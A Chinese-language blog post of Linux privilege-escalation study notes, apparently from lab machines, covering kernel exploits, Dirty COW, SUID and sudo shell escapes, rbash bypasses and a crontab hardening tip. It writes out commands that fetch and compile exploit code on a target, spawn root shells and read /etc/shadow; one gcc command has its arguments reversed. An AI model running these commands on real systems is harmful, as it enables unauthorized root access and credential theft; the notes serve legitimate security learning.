



<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="go-forward" href="http://chungod.github.io/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="go-forward" href="http://chungod.github.io/atom.xml" />
<link rel="alternate" type="application/json" title="go-forward" href="http://chungod.github.io/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  
  <meta name="keywords" content="Linux提权" />


<link rel="canonical" href="http://chungod.github.io/2021/04/10/linux%E6%8F%90%E6%9D%83%E7%AC%94%E8%AE%B0/">



  <title>
Linux提权 |
go-forward = 乌云后面依然是灿烂的晴天</title>
<meta name="generator" content="Hexo 5.4.0"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">Linux提权
  </h1>
  
<div class="meta">
  <span class="item" title="创建时间：2021-04-10 10:24:41">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">发表于</span>
    <time itemprop="dateCreated datePublished" datetime="2021-04-10T10:24:41+08:00">2021-04-10</time>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="切换导航栏">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">go-forward</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
        <ul>
          <li class="item" data-background-image="https://tva2.sinaimg.cn/large/6833939bly1giclgi503lj20zk0m8hdt.jpg"></li>
          <li class="item" data-background-image="https://tva2.sinaimg.cn/large/6833939bly1gicitht3xtj20zk0m8k5v.jpg"></li>
          <li class="item" data-background-image="https://tva2.sinaimg.cn/large/6833939bly1giph4baakhj20zk0m8h5q.jpg"></li>
          <li class="item" data-background-image="https://tva2.sinaimg.cn/large/6833939bly1giclflwv2aj20zk0m84qp.jpg"></li>
          <li class="item" data-background-image="https://tva2.sinaimg.cn/large/6833939bly1gicljgocqbj20zk0m8e81.jpg"></li>
          <li class="item" data-background-image="https://tva2.sinaimg.cn/large/6833939bly1gicitspjpbj20zk0m81ky.jpg"></li>
        </ul>
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">首页</a></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="zh-CN">
  <link itemprop="mainEntityOfPage" href="http://chungod.github.io/2021/04/10/linux%E6%8F%90%E6%9D%83%E7%AC%94%E8%AE%B0/">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/avatar.jpg">
    <meta itemprop="name" content="chun">
    <meta itemprop="description" content="乌云后面依然是灿烂的晴天, 欢迎来到我的博客(*^﹏^*),本人为新人,你可以阅读我的学习笔记并提出独到的见解~我们将互相学习,共同进步,望大佬们勿喷">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="go-forward">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <h2 id="linux提权笔记"><a class="markdownIt-Anchor" href="#linux提权笔记">#</a> linux 提权笔记</h2>
<h4 id="利用内核漏洞提权"><a class="markdownIt-Anchor" href="#利用内核漏洞提权">#</a>  <code>利用内核漏洞提权</code></h4>
<p>先开启一个可以交互的终端</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">python -c &#39;import pty;pty.spawn(&quot;&#x2F;bin&#x2F;bash&quot;)&#39;</span><br><span class="line">python -c &#39;import pty;pty.spawn(&quot;&#x2F;bin&#x2F;sh&quot;)&#39;</span><br><span class="line">&#x2F;bin&#x2F;bash -i</span><br><span class="line">echo os.system(&quot;&#x2F;bin&#x2F;bash&quot;);</span><br></pre></td></tr></table></figure>
<p>发现靶机是低权限</p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210409090920475.png" alt="image-20210409090920475"></p>
<p>查看靶机内核，发现其版本为 Ubuntu 14.04.</p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210409091109670.png" alt="image-20210409091109670"></p>
<p>打开 kali 查询可利用的 exploit，将其下载</p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210409091229671.png" alt="image-20210409091229671"></p>
<p>利用 python 将其传递到靶机上</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">python3 -m http.server 8081</span><br><span class="line">python -m SimpleHTTPServer 8081</span><br><span class="line">靶机：wget http:&#x2F;&#x2F;IP:8081&#x2F;37292.c</span><br></pre></td></tr></table></figure>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210409091411379.png" alt="image-20210409091411379"></p>
<p>将 exp 进行编译执行，成功获得 root 权限</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">gcc -o 37292.c 37292</span><br><span class="line">.&#x2F;37292</span><br></pre></td></tr></table></figure>
<h4 id="利用旧版本nmap提权"><a class="markdownIt-Anchor" href="#利用旧版本nmap提权">#</a>  <code>利用旧版本nmap提权</code></h4>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210409095550386.png" alt="image-20210409091614007"></p>
<p>nmap 支持 “interactive.” 选项，用户能够通过该选项执行 shell 命令，通常，安全人员会使用该命令来避免他们使用 nmap 命令被记录在 history 文件中</p>
<p>查看可利用的提权 find /-perm -u=s 2&gt;/dev/null</p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210409095637576.png" alt="image-20210409095550386"></p>
<p>发现 nmap 存在提权漏洞</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">利用nmap --interactive </span><br><span class="line">!sh	成功提权</span><br></pre></td></tr></table></figure>
<p><strong><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210409091614007.png" alt="image-20210409095637576"></strong></p>
<h4 id="环境变量提权"><a class="markdownIt-Anchor" href="#环境变量提权">#</a>  <code>环境变量提权</code></h4>
<p>利用普通用户找到可执行文件，进行提权</p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210409102649196.png" alt="image-20210122091212588"></p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210409102540192.png" alt="image-20210409102649196"></p>
<h4 id="脏牛提权"><a class="markdownIt-Anchor" href="#脏牛提权">#</a>  <code>脏牛提权</code></h4>
<p>使用 <code>uname -a</code>  命令查看 linux 内核信息，发现在脏牛漏洞范围内，可以进行测试。</p>
<p>(需要 root 用户存在可执行文件)</p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210122091212588.png" alt="image-20210409102540192"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">searchsploit dirty</span><br><span class="line">searchsploit -m 40839.c</span><br></pre></td></tr></table></figure>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210122091605012.png" alt="image-20210410094828540"></p>
<p>3. 将 exp 一下载到本地，使用 gcc -pthread dirty.c -o dirty -lcrypt` 命令对 dirty.c 进行编译，生成一个 dirty 的可执行文件。</p>
<figure class="highlight sas"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">chmod 777 40839.c</span><br><span class="line">gcc -pthread 40839.c -o 40839 -lcrypt</span><br><span class="line">./40839</span><br><span class="line">等一会passwd文件会生成一个firefart用户</span><br><span class="line">su firefart (输入之前的密码,成功提权)</span><br></pre></td></tr></table></figure>
<h4 id="find提权"><a class="markdownIt-Anchor" href="#find提权">#</a>  <code>find提权</code></h4>
<p>(DC-01)</p>
<p>先查找拥有 suid 权限的文件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find &#x2F; -perm -u&#x3D;s 2&gt;&#x2F;dev&#x2F;null</span><br></pre></td></tr></table></figure>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210410094828540.png" alt="image-20210410095644313"></p>
<p>进行提权</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">touch test.txt</span><br><span class="line">find &#x2F; -type f -name test.txt -exec &quot;whoami&quot; \; 发现是root权限</span><br><span class="line">find &#x2F; -type f -name test.txt -exec &quot;&#x2F;bin&#x2F;sh&quot; \; 成功提权</span><br></pre></td></tr></table></figure>
<h4 id="git提权"><a class="markdownIt-Anchor" href="#git提权">#</a>  <code>git提权</code></h4>
<p>(DC-02)</p>
<p>寻找可用提权</p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210410095644313.png" alt="image-20210122091605012"></p>
<p>绕过 rbash 进行提权</p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210410093833321.png" alt="image-20210410100730655"></p>
<p>可用命令有 less、ls、scp、vi，绕过可用如下方法：</p>
<ul>
<li>可使用 less 绕过：$less test  然后！‘sh’</li>
<li>使用 ls 绕过：$man ls  然后！‘sh’</li>
<li>使用 vi 绕过：$vi test  然后:!/bin/sh 或者 :!/bin/bash</li>
</ul>
<p>还可以用 BASH_CMDS [a]=/bin/sh;a 直接绕过</p>
<p>或者更改环境变量，并查看 flag3.txt</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">BASH_CMDS[a]&#x3D;&#x2F;bin&#x2F;sh;a  注：把&#x2F;bin&#x2F;bash给a变量&#96;</span><br><span class="line">export PATH&#x3D;$PATH:&#x2F;bin&#x2F;    注：将&#x2F;bin 作为PATH环境变量导出</span><br><span class="line">export PATH&#x3D;$PATH:&#x2F;usr&#x2F;bin   注：将&#x2F;usr&#x2F;bin作为PATH环境变量导出</span><br></pre></td></tr></table></figure>
<p><strong>尝试 git 提权</strong>：可使用 sudo git help config 或者 sudo git -p help</p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210410093844939.png" alt="image-20210410093833321"></p>
<h4 id="sudo提权"><a class="markdownIt-Anchor" href="#sudo提权">#</a>  <code>sudo提权</code></h4>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">如果知道用户为空密码可以尝试sudo提权</span><br><span class="line">sudo -l， sudo su</span><br><span class="line">或者su root 尝试弱口令</span><br></pre></td></tr></table></figure>
<h4 id="awk提权"><a class="markdownIt-Anchor" href="#awk提权">#</a>  <code>awk提权</code></h4>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo awk &#39;BEGIN&#123;system(&quot;&#x2F;bin&#x2F;sh&quot;)&#125;&#39;</span><br></pre></td></tr></table></figure>
<p>提权成功</p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210410100702235.png" alt="image-20210410093844939"></p>
<h4 id="man提权"><a class="markdownIt-Anchor" href="#man提权">#</a>  <code>man提权</code></h4>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo man man</span><br></pre></td></tr></table></figure>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210410100730655.png" alt="image-20210410100740319"></p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210410100740319.png" alt="image-20210410100702235"></p>
<h4 id="curl提权"><a class="markdownIt-Anchor" href="#curl提权">#</a>  <code>curl提权</code></h4>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo curl file:&#x2F;&#x2F;&#x2F;etc&#x2F;shadow</span><br></pre></td></tr></table></figure>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210410100812432.png" alt="image-20210410101229024"></p>
<h4 id="crontab提权"><a class="markdownIt-Anchor" href="#crontab提权">#</a>  <code>crontab提权</code></h4>
<p>cat /etc/crontab</p>
<p>模拟一下<img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210410101229024.png" alt="image-20210410100812432"></p>
<p>防范：crontab 任务千万不要写到 /etc/crontab 文件里。通过 crontab -e 去创建，让他写到默认的 /var/spool/cron 下；创建任务时，避免使用 root 去创建任务，若用 root 创建任务，注意设置权限，避免 root 权限执行任务。</p>

      <div class="tags">
          <a href="/tags/Linux%E6%8F%90%E6%9D%83/" rel="tag"><i class="ic i-tag"></i> Linux提权</a>
      </div>
  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">更新于</span>
    <time title="修改时间：2021-05-04 13:53:42" itemprop="dateModified" datetime="2021-05-04T13:53:42+08:00">2021-05-04</time>
  </span>
  <span id="2021/04/10/linux提权笔记/" class="item leancloud_visitors" data-flag-title="Linux提权" title="阅读次数">
      <span class="icon">
        <i class="ic i-eye"></i>
      </span>
      <span class="text">阅读次数</span>
      <span class="leancloud-visitors-count"></span>
      <span class="text">次</span>
  </span>
</div>

      
<div class="reward">
  <button><i class="ic i-heartbeat"></i> 赞赏</button>
  <p>请我喝[茶]~(￣▽￣)~*</p>
  <div id="qr">
  </div>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>本文作者： </strong>chun <i class="ic i-at"><em>@</em></i>go-forward
  </li>
  <li class="link">
    <strong>本文链接：</strong>
    <a href="http://chungod.github.io/2021/04/10/linux%E6%8F%90%E6%9D%83%E7%AC%94%E8%AE%B0/" title="Linux提权">http://chungod.github.io/2021/04/10/linux提权笔记/</a>
  </li>
  <li class="license">
    <strong>版权声明： </strong>本站所有文章除特别声明外，均采用 <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC9kZWVkLnpo"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
      

  <a href="/2021/04/09/%E5%86%85%E5%AD%98%E5%8F%96%E8%AF%81/" itemprop="url" rel="prev" data-background-image="https:&#x2F;&#x2F;tva2.sinaimg.cn&#x2F;mw690&#x2F;6833939bly1gipesrnqv3j20zk0m8ava.jpg" title="内存取证">
  <span class="type">上一篇</span>
  <span class="category"><i class="ic i-flag"></i> </span>
  <h3>内存取证</h3>
  </a>

    </div>
    <div class="item right">
      

  <a href="/2021/04/16/Windows%E5%86%85%E6%A0%B8%E6%8F%90%E6%9D%83/" itemprop="url" rel="next" data-background-image="https:&#x2F;&#x2F;tva2.sinaimg.cn&#x2F;mw690&#x2F;6833939bly1giph4lm9i7j20zk0m84qp.jpg" title="Windows内核提权">
  <span class="type">下一篇</span>
  <span class="category"><i class="ic i-flag"></i> </span>
  <h3>Windows内核提权</h3>
  </a>

    </div>
</div>

  
  <div class="wrap" id="comments"></div>


        </div>
        <div id="sidebar">
          

<div class="inner">

  <div class="panels">
    <div class="inner">
      <div class="contents panel pjax" data-title="文章目录">
          <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#linux%E6%8F%90%E6%9D%83%E7%AC%94%E8%AE%B0"><span class="toc-number">1.</span> <span class="toc-text"> linux 提权笔记</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E5%86%85%E6%A0%B8%E6%BC%8F%E6%B4%9E%E6%8F%90%E6%9D%83"><span class="toc-number">1.0.1.</span> <span class="toc-text">  利用内核漏洞提权</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E6%97%A7%E7%89%88%E6%9C%ACnmap%E6%8F%90%E6%9D%83"><span class="toc-number">1.0.2.</span> <span class="toc-text">  利用旧版本nmap提权</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8F%E6%8F%90%E6%9D%83"><span class="toc-number">1.0.3.</span> <span class="toc-text">  环境变量提权</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%84%8F%E7%89%9B%E6%8F%90%E6%9D%83"><span class="toc-number">1.0.4.</span> <span class="toc-text">  脏牛提权</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#find%E6%8F%90%E6%9D%83"><span class="toc-number">1.0.5.</span> <span class="toc-text">  find提权</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#git%E6%8F%90%E6%9D%83"><span class="toc-number">1.0.6.</span> <span class="toc-text">  git提权</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#sudo%E6%8F%90%E6%9D%83"><span class="toc-number">1.0.7.</span> <span class="toc-text">  sudo提权</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#awk%E6%8F%90%E6%9D%83"><span class="toc-number">1.0.8.</span> <span class="toc-text">  awk提权</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#man%E6%8F%90%E6%9D%83"><span class="toc-number">1.0.9.</span> <span class="toc-text">  man提权</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#curl%E6%8F%90%E6%9D%83"><span class="toc-number">1.0.10.</span> <span class="toc-text">  curl提权</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#crontab%E6%8F%90%E6%9D%83"><span class="toc-number">1.0.11.</span> <span class="toc-text">  crontab提权</span></a></li></ol></li></ol></li></ol>
      </div>
      <div class="related panel pjax" data-title="系列文章">
      </div>
      <div class="overview panel" data-title="站点概览">
        <div class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <img class="image" itemprop="image" alt="chun"
      data-src="/images/avatar.jpg">
  <p class="name" itemprop="name">chun</p>
  <div class="description" itemprop="description">欢迎来到我的博客(*^﹏^*),本人为新人,你可以阅读我的学习笔记并提出独到的见解~我们将互相学习,共同进步,望大佬们勿喷</div>
</div>

<nav class="state">
    <div class="item posts">
      <a href="/archives/">
        <span class="count">8</span>
        <span class="name">文章</span>
      </a>
    </div>
    <div class="item tags">
      <a href="/tags/">
        <span class="count">7</span>
        <span class="name">标签</span>
      </a>
    </div>
</nav>

<div class="social">
      <span class="exturl item github" data-url="aHR0cHM6Ly9naXRodWIuY29tL3lvdXJuYW1l" title="https:&#x2F;&#x2F;github.com&#x2F;yourname"><i class="ic i-github"></i></span>
      <span class="exturl item twitter" data-url="aHR0cHM6Ly90d2l0dGVyLmNvbS95b3VybmFtZQ==" title="https:&#x2F;&#x2F;twitter.com&#x2F;yourname"><i class="ic i-twitter"></i></span>
      <span class="exturl item zhihu" data-url="aHR0cHM6Ly93d3cuemhpaHUuY29tL3Blb3BsZS95b3VybmFtZQ==" title="https:&#x2F;&#x2F;www.zhihu.com&#x2F;people&#x2F;yourname"><i class="ic i-zhihu"></i></span>
      <span class="exturl item music" data-url="aHR0cHM6Ly9tdXNpYy4xNjMuY29tLyMvdXNlci9ob21lP2lkPXlvdXJpZA==" title="https:&#x2F;&#x2F;music.163.com&#x2F;#&#x2F;user&#x2F;home?id&#x3D;yourid"><i class="ic i-cloud-music"></i></span>
      <span class="exturl item weibo" data-url="aHR0cHM6Ly93ZWliby5jb20veW91cm5hbWU=" title="https:&#x2F;&#x2F;weibo.com&#x2F;yourname"><i class="ic i-weibo"></i></span>
      <span class="exturl item about" data-url="aHR0cHM6Ly9hYm91dC5tZS95b3VybmFtZQ==" title="https:&#x2F;&#x2F;about.me&#x2F;yourname"><i class="ic i-address-card"></i></span>
</div>

<ul class="menu">
  
    
  <li class="item">
    <a href="/" rel="section"><i class="ic i-home"></i>首页</a>
  </li>

    
  <li class="item">
    <a href="/link/" rel="section"><i class="ic i-link"></i>links</a>
  </li>


</ul>

      </div>
    </div>
  </div>

  <ul id="quick">
    <li class="prev pjax">
        <a href="/2021/04/09/%E5%86%85%E5%AD%98%E5%8F%96%E8%AF%81/" rel="prev" title="上一篇"><i class="ic i-chevron-left"></i></a>
    </li>
    <li class="up"><i class="ic i-arrow-up"></i></li>
    <li class="down"><i class="ic i-arrow-down"></i></li>
    <li class="next pjax">
        <a href="/2021/04/16/Windows%E5%86%85%E6%A0%B8%E6%8F%90%E6%9D%83/" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a>
    </li>
    <li class="percent"></li>
  </ul>
</div>


        </div>
        <div class="dimmer"></div>
      </div>
    </main>
    <footer id="footer">
      <div class="inner">
        <div class="widgets">
          
<div class="rpost pjax">
  <h2>随机文章</h2>
  <ul>
      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2021/04/16/Windows%E5%86%85%E6%A0%B8%E6%8F%90%E6%9D%83/" title="Windows内核提权">Windows内核提权</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2021/04/09/%E5%86%85%E5%AD%98%E5%8F%96%E8%AF%81/" title="内存取证">内存取证</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2021/04/21/meterpreter%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E6%80%BB%E7%BB%93/" title="meterpreter学习笔记">meterpreter学习笔记</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2021/05/04/%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/" title="未命名">未命名</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2021/05/04/php%E5%8D%B1%E9%99%A9%E5%87%BD%E6%95%B0/" title="php危险函数">php危险函数</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2021/05/02/paramiko%E6%A8%A1%E5%9D%97%E4%BB%8B%E7%BB%8D/" title="paramiko模块介绍">paramiko模块介绍</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2021/05/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/" title="upload-labs通关记录">upload-labs通关记录</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2021/04/10/linux%E6%8F%90%E6%9D%83%E7%AC%94%E8%AE%B0/" title="Linux提权">Linux提权</a></span>
  </li>

  </ul>
</div>
<div>
  <h2>最新评论</h2>
  <ul class="leancloud-recent-comment"></ul>
</div>

        </div>
        <div class="status">
  <div class="copyright">
    
    &copy; 2010 – 
    <span itemprop="copyrightYear">2021</span>
    <span class="with-love">
      <i class="ic i-sakura rotate"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">chun @ go-forward</span>
  </div>
  <div class="count">
    <span class="post-meta-item-icon">
      <i class="ic i-chart-area"></i>
    </span>
    <span title="站点总字数">57k 字</span>

    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="ic i-coffee"></i>
    </span>
    <span title="站点阅读时长">52 分钟</span>
  </div>
  <div class="powered-by">
    基于 <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & Theme.<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2FtZWhpbWUvaGV4by10aGVtZS1zaG9rYQ==">Shoka</span>
  </div>
</div>

      </div>
    </footer>
  </div>
<script data-config type="text/javascript">
  var LOCAL = {
    path: '2021/04/10/linux提权笔记/',
    favicon: {
      show: "（●´3｀●）やれやれだぜ",
      hide: "(´Д｀)大変だ！"
    },
    search : {
      placeholder: "文章搜索",
      empty: "关于 「 ${query} 」，什么也没搜到",
      stats: "${time} ms 内找到 ${hits} 条结果"
    },
    valine: true,fancybox: true,copyright: '复制成功，转载请遵守 <i class="ic i-creative-commons"></i>BY-NC-SA 协议。',
    ignores : [
      function(uri) {
        return uri.includes('#');
      },
      function(uri) {
        return new RegExp(LOCAL.path+"$").test(uri);
      }
    ]
  };
</script>

<script src="https://cdn.polyfill.io/v2/polyfill.js"></script>

<script src="//cdn.jsdelivr.net/combine/npm/pace-js@1.0.2/pace.min.js,npm/pjax@0.2.8/pjax.min.js,npm/whatwg-fetch@3.4.0/dist/fetch.umd.min.js,npm/animejs@3.2.0/lib/anime.min.js,npm/algoliasearch@4/dist/algoliasearch-lite.umd.js,npm/instantsearch.js@4/dist/instantsearch.production.min.js,npm/lozad@1/dist/lozad.min.js,npm/quicklink@2/dist/quicklink.umd.js"></script>

<script src="/js/app.js?v=0.2.5"></script>




</body>
</html>
